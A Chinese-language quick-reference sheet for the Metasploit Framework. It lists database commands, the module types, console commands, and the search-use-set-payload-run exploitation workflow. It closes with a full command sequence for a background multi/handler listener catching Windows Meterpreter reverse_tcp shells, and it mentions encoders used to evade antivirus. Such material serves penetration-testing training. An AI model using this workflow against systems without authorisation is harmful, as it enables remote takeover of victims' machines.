Metasploit Framework
注意:使用前先
msfupdate
文件目录
/usr/share/metasploit-framework/
数据库操作
msf > msfdb
[*] exec: msfdb
Manage a metasploit framework database
msfdb init # initialize the database
msfdb reinit # delete and reinitialize the database
msfdb delete # delete database and stop using it
msfdb start # start the database
msfdb stop # stop the database
建立数据库缓存
msf > service postgresql start
msf > db_rebuild_cache
技术功能模块
Exploits 利用系统漏洞进行攻击的模块,对应每一个具体漏洞的攻击方法
Payload 成功exploit之后,真正在目标系统执行的代码或者指令
Single: all in one 体积较大,全功能
Stager: 体积较小,用于建立连接
Stages: 建立连接之后下载的后续payload
Auxiliary 信息收集,指纹,扫描,枚举等功能的辅助模块
Encoders 对payload进行加密以躲避AV检查
Nops 提高payload稳定性及维持大小
MSF控制台命令
search
search name:mysql path:scada platform:aix type:aux author:aaron cve:2011 可多条件同时搜索
search -h 帮助
Use
use 漏洞路径
– info 显示详细信息
– show options 显示可修改选项
–show payloads 显示可利用payloads
–show targets 显示可用目标
–show advanced 显示高级
–show evasion 显示躲避
–show missing 显示还剩什么没填完
set 参数
set RHOST 192.168.8.117
set target //指定目标操作系统
unset //取消设置
setg 参数
和set不同的是setg //set_global 全局设置
Payload
一些exploit漏洞需要注入payload达到渗透功能
-show payloads 显示适配的payload
-set payload 路径 选择payload
Exploit漏洞利用过程: search到漏洞—->use 路径—->info查看信息以及show option—->set 参数—->set payload指定payload—->run 进行exploit
建立持续性监听端口
msf>use exploit/multi/handler
msf>set payload windows/meterpreter/reverse_tcp
msf>set lhost
msf>set lport
msf>set ExitOnSession false
msf>exploit -j
-j选项能够让这个exploit以jobs的形式持续在后台运行。
set ExitOnSession false 能够让单个session退出时jobs不结束,同时可以维持多个sessions